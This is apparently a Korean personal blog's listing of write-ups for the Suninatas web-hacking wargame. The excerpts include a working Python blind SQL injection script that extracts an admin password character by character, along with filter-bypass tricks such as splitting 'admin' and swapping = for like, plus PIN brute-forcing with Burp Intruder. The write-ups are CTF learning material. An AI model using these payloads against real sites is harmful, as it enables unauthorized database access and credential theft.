일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |
- EER
- webhacking 처음
- mysql
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- 방명록 만들기
- 행정지역 DB
- 동읍면 DB
- Database
- react
- frontend
- 인턴 지원
- 3단계 지역 DB
- PyAmdecoder
- spring
- jsp
- 네이버 인턴
- 메모리 포랜식
- 인턴 후기
- reversing.kr
- DBMS
- Forensic 절차
- JSTL
- 정보보호병 후기
- SessionAttribute
- Layered Architecture
- Django
- restapi
- riceteacatpanda
- 소프트웨어 개발보안 경진대회
- 소개딩
- Today
- Total
목록WEB_HACKING/Suninatas (10)
웹찢남

글자수 제한이 있어서 화가 났다.... right함수를 쓰면 끝까지 풀 수 있을 것 같은데 머리가 띵 해져서ㅎ... admin이 필터링 되있어서 ad'+'min'으로 bypass가 가능하다. 근데 전과다르게 substring 필터링 돼 있어서 방법을 생각해보니 left와 right가 있었다. 근데 하다보니 또뭔 글자수 제한도 있었다... 두번 코드짜기가 너무 싫어서 한번에 할 방법을 생각하다 부등호를 사용하기로했다. 아래는 코드! import re import requests import time flag = '' length= 0 str1='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range (1,20): for ..

대놓고 blind sql injection 문제다.. 여러 값을 넣어보면 pw를 나중에 한번 더 확인 하는 걸 알 수있다. import re import requests import time flag = '' length= 0 for i in range (1,20): for j in range(33,122): r=requests.post("http://www.suninatas.com/challenge/web22/web22.asp?id=admin' and substring(pw,"+str(i)+",1)='"+chr(j)+"'-- &pw=123") if 'OK admin' in r.text: flag=flag+chr(j) print("finding pw: "+flag) break print("pw "+fla..

소스 코드를 확인해보면 아래와 같이 브루트 포싱을 하라고 대놓고 나와있다... case가 10000개나... 버프수트의 intruder을 사용해 payload를 보냈고 pw는 7707이었다 Clear!!!

카페에서 문제풀다가 조금 당황 했다 ㅎ... 어쨋든 소스코드를 보면 아래와 같은 것들이 있다. hint와 아래에 로 숨겨져있던 submit 버튼이다. console에 frm.submit()을 쳐놓고 새로고침을 하면서 파박! 하면 CLEAR!!!

해당 문제로 들어가면 다음과 같은 board가 나오는데 세번째 article이 메인이다. password input을 bypass하면 되는데 특정 문자를 입력하면 No hack 이라고 뜬다. 확인해본결과 = 이 필터링 돼 like를 사용하기로 했다. 들어가면 어떤 글이 나온다. 저 auth key가 flag인줄 알았는데 아니었다... 저건 뭔지 모르겠지만 안에 들어가 소스 코드 보기를 눌러보나 아래와 같은 글이 있었다 구글링 하니 아우구스투스 라는 답이 나왔따. CLEAR!!!